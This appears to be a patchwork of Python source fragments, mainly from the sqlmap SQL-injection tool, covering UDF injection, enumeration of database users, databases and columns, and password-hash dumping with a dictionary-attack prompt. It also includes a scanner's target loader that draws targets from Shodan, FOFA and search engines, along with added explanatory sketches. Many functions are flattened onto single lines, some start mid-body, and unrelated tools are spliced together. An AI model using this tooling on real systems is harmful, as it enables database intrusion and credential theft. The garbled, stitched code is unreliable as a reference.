conf.clear() kb.clear() main() if conf.get("api"): try: conf.databaseCursor.disconnect() except KeyboardInterrupt: pass if conf.get("dumper"): conf.dumper.flush() # short delay for thread finalization try: _ = time.time() while threading.activeCount() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT: time.sleep(0.01) except KeyboardInterrupt: pass finally: # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program if threading.activeCount() > 1: os._exit(0)
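# --- Illustrative sketch (not part of sqlmap) ---------------------------------
# The main() variants above finish with a short wait for worker threads
# (THREAD_FINALIZATION_TIMEOUT), and the oldest one falls back to os._exit() if
# threads are still alive. The pattern in isolation; note that this sketch
# waits *up to* the timeout, and the timeout value is only an example:

import os
import threading
import time

THREAD_FINALIZATION_TIMEOUT = 1.0   # seconds

def shutdown_with_grace():
    started = time.time()
    # give non-main threads a brief chance to wind down
    while threading.active_count() > 1 and (time.time() - started) < THREAD_FINALIZATION_TIMEOUT:
        time.sleep(0.01)
    # anything still alive at this point is abandoned deliberately
    if threading.active_count() > 1:
        os._exit(0)

if __name__ == "__main__":
    threading.Thread(target=time.sleep, args=(0.2,), daemon=True).start()
    shutdown_with_grace()
    print("clean exit")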
def udfInjectCustom(self): if Backend.getIdentifiedDbms() not in (DBMS.MYSQL, DBMS.PGSQL): errMsg = "UDF injection feature only works on MySQL and PostgreSQL" logger.error(errMsg) return if not isStackingAvailable() and not conf.direct: errMsg = "UDF injection feature requires stacked queries SQL injection" logger.error(errMsg) return self.checkDbmsOs() if not self.isDba(): warnMsg = "functionality requested probably does not work because " warnMsg += "the current session user is not a database administrator" logger.warn(warnMsg) if not conf.shLib: msg = "what is the local path of the shared library? " while True: self.udfLocalFile = readInput(msg) if self.udfLocalFile: break else: logger.warn("you need to specify the local path of the shared library") else: self.udfLocalFile = conf.shLib if not os.path.exists(self.udfLocalFile): errMsg = "the specified shared library file does not exist" raise SqlmapFilePathException(errMsg) if not self.udfLocalFile.endswith(".dll") and not self.udfLocalFile.endswith(".so"): errMsg = "shared library file must end with '.dll' or '.so'" raise SqlmapMissingMandatoryOptionException(errMsg) elif self.udfLocalFile.endswith(".so") and Backend.isOs(OS.WINDOWS): errMsg = "you provided a shared object as shared library, but " errMsg += "the database underlying operating system is Windows" raise SqlmapMissingMandatoryOptionException(errMsg) elif self.udfLocalFile.endswith(".dll") and Backend.isOs(OS.LINUX): errMsg = "you provided a dynamic-link library as shared library, " errMsg += "but the database underlying operating system is Linux" raise SqlmapMissingMandatoryOptionException(errMsg) self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(".")[0] self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(".")[1] msg = "how many user-defined functions do you want to create " msg += "from the shared library? " while True: udfCount = readInput(msg, default='1') if udfCount.isdigit(): udfCount = int(udfCount) if udfCount <= 0: logger.info("nothing to inject then") return else: break else: logger.warn("invalid value, only digits are allowed") for x in xrange(0, udfCount): while True: msg = "what is the name of the UDF number %d? " % (x + 1) udfName = readInput(msg) if udfName: self.udfs[udfName] = {} break else: logger.warn("you need to specify the name of the UDF") if Backend.isDbms(DBMS.MYSQL): defaultType = "string" elif Backend.isDbms(DBMS.PGSQL): defaultType = "text" self.udfs[udfName]["input"] = [] msg = "how many input parameters takes UDF " msg += "'%s'? (default: 1) " % udfName while True: parCount = readInput(msg, default='1') if parCount.isdigit() and int(parCount) >= 0: parCount = int(parCount) break else: logger.warn("invalid value, only digits >= 0 are allowed") for y in xrange(0, parCount): msg = "what is the data-type of input parameter " msg += "number %d? (default: %s) " % ((y + 1), defaultType) while True: parType = readInput(msg, default=defaultType).strip() if parType.isdigit(): logger.warn("you need to specify the data-type of the parameter") else: self.udfs[udfName]["input"].append(parType) break msg = "what is the data-type of the return " msg += "value? 
(default: %s) " % defaultType while True: retType = readInput(msg, default=defaultType) if hasattr(retType, "isdigit") and retType.isdigit(): logger.warn("you need to specify the data-type of the return value") else: self.udfs[udfName]["return"] = retType break success = self.udfInjectCore(self.udfs) if success is False: self.cleanup(udfDict=self.udfs) return False msg = "do you want to call your injected user-defined " msg += "functions now? [Y/n/q] " choice = readInput(msg, default='Y').upper() if choice == 'N': self.cleanup(udfDict=self.udfs) return elif choice == 'Q': self.cleanup(udfDict=self.udfs) raise SqlmapUserQuitException while True: udfList = [] msg = "which UDF do you want to call?" for udf in self.udfs.keys(): udfList.append(udf) msg += "\n[%d] %s" % (len(udfList), udf) msg += "\n[q] Quit" while True: choice = readInput(msg).upper() if choice == 'Q': break elif hasattr(choice, "isdigit") and choice.isdigit() and int(choice) > 0 and int(choice) <= len(udfList): choice = int(choice) break elif isinstance(choice, int) and choice > 0 and choice <= len(udfList): break else: warnMsg = "invalid value, only digits >= 1 and " warnMsg += "<= %d are allowed" % len(udfList) logger.warn(warnMsg) if not isinstance(choice, int): break cmd = "" count = 1 udfToCall = udfList[choice - 1] for inp in self.udfs[udfToCall]["input"]: msg = "what is the value of the parameter number " msg += "%d (data-type: %s)? " % (count, inp) while True: parValue = readInput(msg) if parValue: if "int" not in inp and "bool" not in inp: parValue = "'%s'" % parValue cmd += "%s," % parValue break else: logger.warn("you need to specify the value of the parameter") count += 1 cmd = cmd[:-1] msg = "do you want to retrieve the return value of the " msg += "UDF? [Y/n] " if readInput(msg, default='Y', boolean=True): output = self.udfEvalCmd(cmd, udfName=udfToCall) if output: conf.dumper.string("return value", output) else: dataToStdout("No return value\n") else: self.udfExecCmd(cmd, udfName=udfToCall, silent=True) msg = "do you want to call this or another injected UDF? [Y/n] " if not readInput(msg, default='Y', boolean=True): break self.cleanup(udfDict=self.udfs)
def put_target(self, obj, service=None):
    self.targets.append([obj, service])
    if len(self.targets) > self.target_pool_total:
        msg = 'Too many targets! Please keep the number of targets under %d.' % self.target_pool_total
        sys.exit(logger.error(msg))
def getUsers(self): infoMsg = "fetching database users" logger.info(infoMsg) rootQuery = queries[Backend.getIdentifiedDbms()].users condition = (Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin( ("2005", "2008"))) condition |= (Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema) if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if Backend.isFork(FORK.DRIZZLE): query = rootQuery.inband.query3 elif condition: query = rootQuery.inband.query2 else: query = rootQuery.inband.query values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): kb.data.cachedUsers = [] for value in arrayizeValue(values): value = unArrayizeValue(value) if not isNoneValue(value): kb.data.cachedUsers.append(value) if not kb.data.cachedUsers and isInferenceAvailable( ) and not conf.direct: infoMsg = "fetching number of database users" logger.info(infoMsg) if Backend.isFork(FORK.DRIZZLE): query = rootQuery.blind.count3 elif condition: query = rootQuery.blind.count2 else: query = rootQuery.blind.count count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if count == 0: return kb.data.cachedUsers elif not isNumPosStrValue(count): errMsg = "unable to retrieve the number of database users" raise SqlmapNoneDataException(errMsg) plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: if Backend.getIdentifiedDbms() in (DBMS.SYBASE, DBMS.MAXDB): query = rootQuery.blind.query % (kb.data.cachedUsers[-1] if kb.data.cachedUsers else " ") elif Backend.isFork(FORK.DRIZZLE): query = rootQuery.blind.query3 % index elif condition: query = rootQuery.blind.query2 % index else: query = rootQuery.blind.query % index user = unArrayizeValue( inject.getValue(query, union=False, error=False)) if user: kb.data.cachedUsers.append(user) if not kb.data.cachedUsers: errMsg = "unable to retrieve the database users" logger.error(errMsg) return kb.data.cachedUsers
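# --- Illustrative sketch (not part of sqlmap) ---------------------------------
# The inference branch of getUsers() first asks for a row count and then pulls
# one value per request using an index. The same two-phase shape, with a
# hypothetical fetch_value(query) standing in for inject.getValue():

def enumerate_rows(fetch_value, count_query, row_query_template):
    count = fetch_value(count_query)
    if not str(count).isdigit() or int(count) == 0:
        return []
    rows = []
    for index in range(int(count)):
        value = fetch_value(row_query_template % index)
        if value:
            rows.append(value)
    return rows

if __name__ == "__main__":
    fake_db = ["root", "app", "readonly"]
    def fetch_value(query):
        # toy oracle: "COUNT" returns the row count, anything else an indexed row
        if query == "COUNT":
            return len(fake_db)
        return fake_db[int(query.split()[-1])]
    print(enumerate_rows(fetch_value, "COUNT", "ROW AT %d"))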
def load_targets(self): if 'target_simple' in conf.keys(): self._load_target(conf['target_simple']) logger.sysinfo("Loading target: %s" % (conf['target_simple'])) elif 'target_file' in conf.keys(): for _line in open(conf['target_file'], 'r'): line = _line.strip() if line: self._load_target(line) logger.sysinfo("Loading target: %s" % (conf['target_file'])) elif 'target_nmap_xml' in conf.keys(): import xml.etree.ElementTree as ET tree = ET.parse(conf['target_nmap_xml']) root = tree.getroot() for host in root.findall('host'): host_id = host.find('address').get('addr') # infoLit = [] for port in host.iter('port'): port_id = port.attrib.get('portid') port_protocol = port.attrib.get('protocol') port_state = port.find('state').attrib.get('state') try: port_service = port.find('service').attrib.get('name') except: port_service = "None" # infoDic = {"port": port_id, "status": port_state, "server": port_service, "other": port_protocol} # infoLit.append(infoDic) if port_state.lower() not in ['closed', 'filtered']: self._load_target(host_id + ":" + port_id, port_service) # resDic = {"host": host_id, "info": infoLit} # resLit.append(resDic) logger.sysinfo("Loading target: %s" % (conf['target_nmap_xml'])) elif 'target_network' in conf.keys(): self._load_target(conf['target_network']) logger.sysinfo("Loading target: %s" % (conf['target_network'])) elif 'target_task' in conf.keys(): hashdb = HashDB(os.path.join(paths.DATA_PATH, conf['target_task'])) hashdb.connect() for _row in hashdb.select_all(): if _row[4] != None and _row[4] != '': self._load_target(_row[4]) else: self._load_target(_row[2] + ":" + _row[3]) logger.sysinfo("Loading target: %s" % (conf['target_task'])) elif 'target_search_engine' in conf.keys(): logger.sysinfo("Loading target by baidu/bing/360so: %s" % (conf['target_search_engine'])) urls = search_engine(conf['target_search_engine']) for _url in urls: if _url: self._load_target(_url) elif 'target_zoomeye' in conf.keys(): logger.sysinfo("Loading target by zoomeye: %s" % (conf['target_zoomeye'])) urls = search_api(conf['target_zoomeye']) for _url in urls: if _url: self._load_target(_url) elif 'target_shodan' in conf.keys(): logger.sysinfo("Loading target by shadon: %s" % (conf['target_shodan'])) urls = search_api(conf['target_shodan']) for _url in urls: if _url: self._load_target(_url) elif 'target_fofa' in conf.keys(): logger.sysinfo("Loading target by fofa: %s" % (conf['target_fofa'])) urls = search_api(conf['target_fofa']) for _url in urls: if _url: self._load_target(_url) elif 'target_fofa_today_poc' in conf.keys(): logger.sysinfo("Loading target by fofa today poc: %s" % (conf['target_fofa_today_poc'])) obj = search_api(conf['target_fofa_today_poc']) for _url, _server in obj: if _url: self._load_target(_url, _server) elif 'target_google' in conf.keys(): logger.sysinfo("Loading target by google: %s" % (conf['target_google'])) urls = search_api(conf['target_google']) for _url in urls: if _url: self._load_target(_url) elif 'target_github' in conf.keys(): logger.sysinfo("Loading target by github: %s" % (conf['target_github'])) urls = search_api(conf['target_github']) else: sys.exit( logger.error("Can't load any targets! Please check input.")) if len(self.targets) == 0: sys.exit( logger.error("Can't load any targets! Please check input."))
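# --- Illustrative sketch (not part of the tool above) --------------------------
# The 'target_nmap_xml' branch above walks an nmap XML report and keeps only
# host:port pairs whose state is not closed/filtered. A self-contained version
# of that extraction, run against an inline sample report:

import xml.etree.ElementTree as ET

SAMPLE = """
<nmaprun>
  <host>
    <address addr="10.0.0.5"/>
    <ports>
      <port protocol="tcp" portid="80"><state state="open"/><service name="http"/></port>
      <port protocol="tcp" portid="23"><state state="filtered"/></port>
    </ports>
  </host>
</nmaprun>
"""

def targets_from_nmap_xml(xml_text):
    targets = []
    root = ET.fromstring(xml_text)
    for host in root.findall('host'):
        addr = host.find('address').get('addr')
        for port in host.iter('port'):
            state = port.find('state').get('state')
            service = port.find('service').get('name') if port.find('service') is not None else None
            if state.lower() not in ('closed', 'filtered'):
                targets.append(("%s:%s" % (addr, port.get('portid')), service))
    return targets

if __name__ == "__main__":
    print(targets_from_nmap_xml(SAMPLE))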
def getPasswordHashes(self): infoMsg = "fetching database users password hashes" rootQuery = queries[Backend.getIdentifiedDbms()].passwords if conf.user == CURRENT_USER: infoMsg += " for current user" conf.user = self.getCurrentUser() logger.info(infoMsg) if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.user = conf.user.upper() if conf.user: users = conf.user.split(',') if Backend.isDbms(DBMS.MYSQL): for user in users: parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] else: users = [] users = [_ for _ in users if _] if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin( ("2005", "2008")): query = rootQuery.inband.query2 else: query = rootQuery.inband.query condition = rootQuery.inband.condition if conf.user: query += " WHERE " query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) if Backend.isDbms(DBMS.SYBASE): getCurrentThreadData().disableStdOut = True retVal = pivotDumpTable( "(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=False) if retVal: for user, password in filterPairValues( _zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: kb.data.cachedUsersPasswords[user].append(password) getCurrentThreadData().disableStdOut = False else: values = inject.getValue(query, blind=False, time=False) if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): values = inject.getValue(query.replace( "master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), blind=False, time=False) elif Backend.isDbms( DBMS.MYSQL) and (isNoneValue(values) or all( len(value) == 2 and (isNullValue(value[1]) or isNoneValue(value[1])) for value in values)): values = inject.getValue(query.replace( "authentication_string", "password"), blind=False, time=False) for user, password in filterPairValues(values): if not user or user == " ": continue password = parsePasswordHash(password) if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: kb.data.cachedUsersPasswords[user].append(password) if not kb.data.cachedUsersPasswords and isInferenceAvailable( ) and not conf.direct: fallback = False if not len(users): users = self.getUsers() if Backend.isDbms(DBMS.MYSQL): for user in users: parsedUser = re.search(r"['\"]?(.*?)['\"]?\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] if Backend.isDbms(DBMS.SYBASE): getCurrentThreadData().disableStdOut = True query = rootQuery.inband.query retVal = pivotDumpTable( "(%s) AS %s" % (query, kb.aliasName), ['%s.name' % kb.aliasName, '%s.password' % kb.aliasName], blind=True) if retVal: for user, password in filterPairValues( _zip(retVal[0]["%s.name" % kb.aliasName], retVal[0]["%s.password" % kb.aliasName])): password = "******" % encodeHex(password, binary=False).upper() if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: kb.data.cachedUsersPasswords[user].append(password) getCurrentThreadData().disableStdOut = False else: retrievedUsers = set() for user in users: user = unArrayizeValue(user) if user in retrievedUsers: continue if Backend.isDbms(DBMS.INFORMIX): count = 1 else: infoMsg = "fetching number of password hashes " infoMsg += "for user 
'%s'" % user logger.info(infoMsg) if Backend.isDbms( DBMS.MSSQL) and Backend.isVersionWithin( ("2005", "2008")): query = rootQuery.blind.count2 % user else: query = rootQuery.blind.count % user count = inject.getValue( query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): if Backend.isDbms(DBMS.MSSQL): fallback = True count = inject.getValue( query.replace( "master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) elif Backend.isDbms(DBMS.MYSQL): fallback = True count = inject.getValue( query.replace("authentication_string", "password"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of password " warnMsg += "hashes for user '%s'" % user logger.warn(warnMsg) continue infoMsg = "fetching password hashes for user '%s'" % user logger.info(infoMsg) passwords = [] plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: if Backend.isDbms(DBMS.MSSQL): if Backend.isVersionWithin(("2005", "2008")): query = rootQuery.blind.query2 % (user, index, user) else: query = rootQuery.blind.query % (user, index, user) if fallback: query = query.replace( "master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr") elif Backend.isDbms(DBMS.INFORMIX): query = rootQuery.blind.query % (user, ) elif Backend.isDbms(DBMS.HSQLDB): query = rootQuery.blind.query % (index, user) else: query = rootQuery.blind.query % (user, index) if Backend.isDbms(DBMS.MYSQL): if fallback: query = query.replace("authentication_string", "password") password = unArrayizeValue( inject.getValue(query, union=False, error=False)) password = parsePasswordHash(password) passwords.append(password) if passwords: kb.data.cachedUsersPasswords[user] = passwords else: warnMsg = "unable to retrieve the password " warnMsg += "hashes for user '%s'" % user logger.warn(warnMsg) retrievedUsers.add(user) if not kb.data.cachedUsersPasswords: errMsg = "unable to retrieve the password hashes for the " errMsg += "database users" logger.error(errMsg) else: for user in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = list( set(kb.data.cachedUsersPasswords[user])) storeHashesToFile(kb.data.cachedUsersPasswords) message = "do you want to perform a dictionary-based attack " message += "against retrieved password hashes? [Y/n/q]" choice = readInput(message, default='Y').upper() if choice == 'N': pass elif choice == 'Q': raise SqlmapUserQuitException else: attackCachedUsersPasswords() return kb.data.cachedUsersPasswords
def getDbs(self): if len(kb.data.cachedDbs) > 0: return kb.data.cachedDbs infoMsg = None if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: warnMsg = "information_schema not available, " warnMsg += "back-end DBMS is MySQL < 5. database " warnMsg += "names will be fetched from 'mysql' database" logger.warn(warnMsg) elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL): warnMsg = "schema names are going to be used on %s " % Backend.getIdentifiedDbms( ) warnMsg += "for enumeration as the counterpart to database " warnMsg += "names on other DBMSes" logger.warn(warnMsg) infoMsg = "fetching database (schema) names" else: infoMsg = "fetching database names" if infoMsg: logger.info(infoMsg) rootQuery = queries[Backend.getIdentifiedDbms()].dbs if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if Backend.isDbms( DBMS.MYSQL) and not kb.data.has_information_schema: query = rootQuery.inband.query2 else: query = rootQuery.inband.query values = inject.getValue(query, blind=False, time=False) if not isNoneValue(values): kb.data.cachedDbs = arrayizeValue(values) if not kb.data.cachedDbs and isInferenceAvailable( ) and not conf.direct: infoMsg = "fetching number of databases" logger.info(infoMsg) if Backend.isDbms( DBMS.MYSQL) and not kb.data.has_information_schema: query = rootQuery.blind.count2 else: query = rootQuery.blind.count count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): errMsg = "unable to retrieve the number of databases" logger.error(errMsg) else: plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: if Backend.isDbms(DBMS.SYBASE): query = rootQuery.blind.query % (kb.data.cachedDbs[-1] if kb.data.cachedDbs else " ") elif Backend.isDbms( DBMS.MYSQL) and not kb.data.has_information_schema: query = rootQuery.blind.query2 % index else: query = rootQuery.blind.query % index db = unArrayizeValue( inject.getValue(query, union=False, error=False)) if db: kb.data.cachedDbs.append( safeSQLIdentificatorNaming(db)) if not kb.data.cachedDbs and Backend.isDbms(DBMS.MSSQL): if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: blinds = (False, True) else: blinds = (True, ) for blind in blinds: count = 0 kb.data.cachedDbs = [] while True: query = rootQuery.inband.query2 % count value = unArrayizeValue(inject.getValue(query, blind=blind)) if not (value or "").strip(): break else: kb.data.cachedDbs.append(value) count += 1 if kb.data.cachedDbs: break if not kb.data.cachedDbs: infoMsg = "falling back to current database" logger.info(infoMsg) self.getCurrentDb() if kb.data.currentDb: kb.data.cachedDbs = [kb.data.currentDb] else: errMsg = "unable to retrieve the database names" raise SqlmapNoneDataException(errMsg) else: kb.data.cachedDbs.sort() if kb.data.cachedDbs: kb.data.cachedDbs = filter( None, list(set(flattenValue(kb.data.cachedDbs)))) return kb.data.cachedDbs
        if numThreads > 1:
            logger.info("waiting for threads to finish%s" % (" (Ctrl+C was pressed)" if isinstance(ex, KeyboardInterrupt) else ""))

        try:
            while (threading.activeCount() > 1):
                pass
        except KeyboardInterrupt:
            raise SqlmapThreadException("user aborted (Ctrl+C was pressed multiple times)")

        if forwardException:
            raise

    except (SqlmapConnectionException, SqlmapValueException), ex:
        print
        kb.threadException = True
        logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message))

    except:
        from lib.core.common import unhandledExceptionMessage

        print
        kb.threadException = True
        errMsg = unhandledExceptionMessage()
        logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg))
        traceback.print_exc()

    finally:
        kb.multiThreadMode = False
        kb.bruteMode = False
        kb.threadContinue = True
        kb.threadException = False
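# --- Illustrative sketch (not part of sqlmap) ---------------------------------
# The handler above relies on shared flags (kb.threadContinue, kb.threadException)
# so that one failing worker makes its siblings stop cooperatively. A minimal
# standalone version of that flag protocol:

import threading

class SharedState(object):
    def __init__(self):
        self.threadContinue = True
        self.threadException = False

def worker(state, items):
    try:
        for item in items:
            if not state.threadContinue:     # a sibling already failed
                break
            if item == "bad":
                raise ValueError("simulated failure")
    except Exception:
        state.threadException = True
        state.threadContinue = False         # tell the other workers to stop

if __name__ == "__main__":
    state = SharedState()
    threads = [threading.Thread(target=worker, args=(state, ["ok", "bad", "ok"])) for _ in range(3)]
    for t in threads:
        t.start()
    for t in threads:
        t.join()
    print("threadException:", state.threadException)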
def getColumns(self, onlyColNames=False, colTuple=None, bruteForce=None): self.forceDbmsEnum() if conf.db is None or conf.db == CURRENT_DB: if conf.db is None: warnMsg = "missing database parameter. sqlmap is going " warnMsg += "to use the current database to enumerate " warnMsg += "table(s) columns" logger.warn(warnMsg) conf.db = self.getCurrentDb() if not conf.db: errMsg = "unable to retrieve the current " errMsg += "database name" raise SqlmapNoneDataException(errMsg) elif conf.db is not None: if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.HSQLDB): conf.db = conf.db.upper() if ',' in conf.db: errMsg = "only one database name is allowed when enumerating " errMsg += "the tables' columns" raise SqlmapMissingMandatoryOptionException(errMsg) conf.db = safeSQLIdentificatorNaming(conf.db) if conf.col: if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.col = conf.col.upper() colList = conf.col.split(',') else: colList = [] if conf.excludeCol: colList = [ _ for _ in colList if _ not in conf.excludeCol.split(',') ] for col in colList: colList[colList.index(col)] = safeSQLIdentificatorNaming(col) colList = filter(None, colList) if conf.tbl: if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.tbl = conf.tbl.upper() tblList = conf.tbl.split(",") else: self.getTables() if len(kb.data.cachedTables) > 0: if conf.db in kb.data.cachedTables: tblList = kb.data.cachedTables[conf.db] else: tblList = kb.data.cachedTables.values() if isinstance(tblList[0], (set, tuple, list)): tblList = tblList[0] tblList = list(tblList) else: errMsg = "unable to retrieve the tables " errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) raise SqlmapNoneDataException(errMsg) tblList = filter(None, (safeSQLIdentificatorNaming(_, True) for _ in tblList)) if bruteForce is None: if Backend.isDbms( DBMS.MYSQL) and not kb.data.has_information_schema: errMsg = "information_schema not available, " errMsg += "back-end DBMS is MySQL < 5.0" logger.error(errMsg) bruteForce = True elif Backend.isDbms(DBMS.ACCESS): errMsg = "cannot retrieve column names, " errMsg += "back-end DBMS is Access" logger.error(errMsg) bruteForce = True if bruteForce: resumeAvailable = False for tbl in tblList: for db, table, colName, colType in kb.brute.columns: if db == conf.db and table == tbl: resumeAvailable = True break if resumeAvailable and not conf.freshQueries or colList: columns = {} for column in colList: columns[column] = None for tbl in tblList: for db, table, colName, colType in kb.brute.columns: if db == conf.db and table == tbl: columns[colName] = colType if conf.db in kb.data.cachedColumns: kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)][safeSQLIdentificatorNaming( tbl, True)] = columns else: kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)] = { safeSQLIdentificatorNaming(tbl, True): columns } return kb.data.cachedColumns message = "do you want to use common column existence check? 
%s" % ( "[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, ) else "[y/N/q]") test = readInput(message, default="Y" if "Y" in message else "N") if test[0] in ("n", "N"): return elif test[0] in ("q", "Q"): raise SqlmapUserQuitException else: return columnExists(paths.COMMON_COLUMNS) rootQuery = queries[Backend.getIdentifiedDbms()].columns condition = rootQuery.blind.condition if 'condition' in rootQuery.blind else None if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: for tbl in tblList: if conf.db is not None and len(kb.data.cachedColumns) > 0 \ and conf.db in kb.data.cachedColumns and tbl in \ kb.data.cachedColumns[conf.db]: infoMsg = "fetched tables' columns on " infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) return {conf.db: kb.data.cachedColumns[conf.db]} infoMsg = "fetching columns " condQuery = "" if len(colList) > 0: if colTuple: _, colCondParam = colTuple infoMsg += "like '%s' " % ", ".join( unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join( unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join( condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming( tbl) infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.inband.query % ( unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.inband.query % ( unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) query += condQuery elif Backend.isDbms(DBMS.MSSQL): query = rootQuery.inband.query % ( conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) query += condQuery.replace("[DB]", conf.db) elif Backend.getIdentifiedDbms() in (DBMS.SQLITE, DBMS.FIREBIRD): query = rootQuery.inband.query % tbl values = inject.getValue(query, blind=False, time=False) if Backend.isDbms(DBMS.MSSQL) and isNoneValue(values): index, values = 1, [] while True: query = rootQuery.inband.query2 % (conf.db, tbl, index) value = unArrayizeValue( inject.getValue(query, blind=False, time=False)) if isNoneValue(value) or value == " ": break else: values.append((value, )) index += 1 if Backend.isDbms(DBMS.SQLITE): parseSqliteTableSchema(unArrayizeValue(values)) elif not isNoneValue(values): table = {} columns = {} for columnData in values: if not isNoneValue(columnData): name = safeSQLIdentificatorNaming(columnData[0]) if name: if conf.getComments: _ = queries[Backend.getIdentifiedDbms( )].column_comment if hasattr(_, "query"): if Backend.getIdentifiedDbms() in ( DBMS.ORACLE, DBMS.DB2): query = _.query % ( unsafeSQLIdentificatorNaming( conf.db.upper()), unsafeSQLIdentificatorNaming( tbl.upper()), unsafeSQLIdentificatorNaming( name.upper())) else: query = _.query % ( unsafeSQLIdentificatorNaming( conf.db), unsafeSQLIdentificatorNaming( tbl), unsafeSQLIdentificatorNaming( name)) comment = unArrayizeValue( inject.getValue(query, blind=False, time=False)) else: warnMsg = "on %s it is not " % Backend.getIdentifiedDbms( ) warnMsg += "possible to get column comments" 
singleTimeWarnMessage(warnMsg) if len(columnData) == 1: columns[name] = None else: if Backend.isDbms(DBMS.FIREBIRD): columnData[1] = FIREBIRD_TYPES.get( columnData[1], columnData[1]) columns[name] = columnData[1] if conf.db in kb.data.cachedColumns: kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)][safeSQLIdentificatorNaming( tbl, True)] = columns else: table[safeSQLIdentificatorNaming(tbl, True)] = columns kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)] = table elif isInferenceAvailable() and not conf.direct: for tbl in tblList: if conf.db is not None and len(kb.data.cachedColumns) > 0 \ and conf.db in kb.data.cachedColumns and tbl in \ kb.data.cachedColumns[conf.db]: infoMsg = "fetched tables' columns on " infoMsg += "database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) return {conf.db: kb.data.cachedColumns[conf.db]} infoMsg = "fetching columns " condQuery = "" if len(colList) > 0: if colTuple: _, colCondParam = colTuple infoMsg += "like '%s' " % ", ".join( unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) 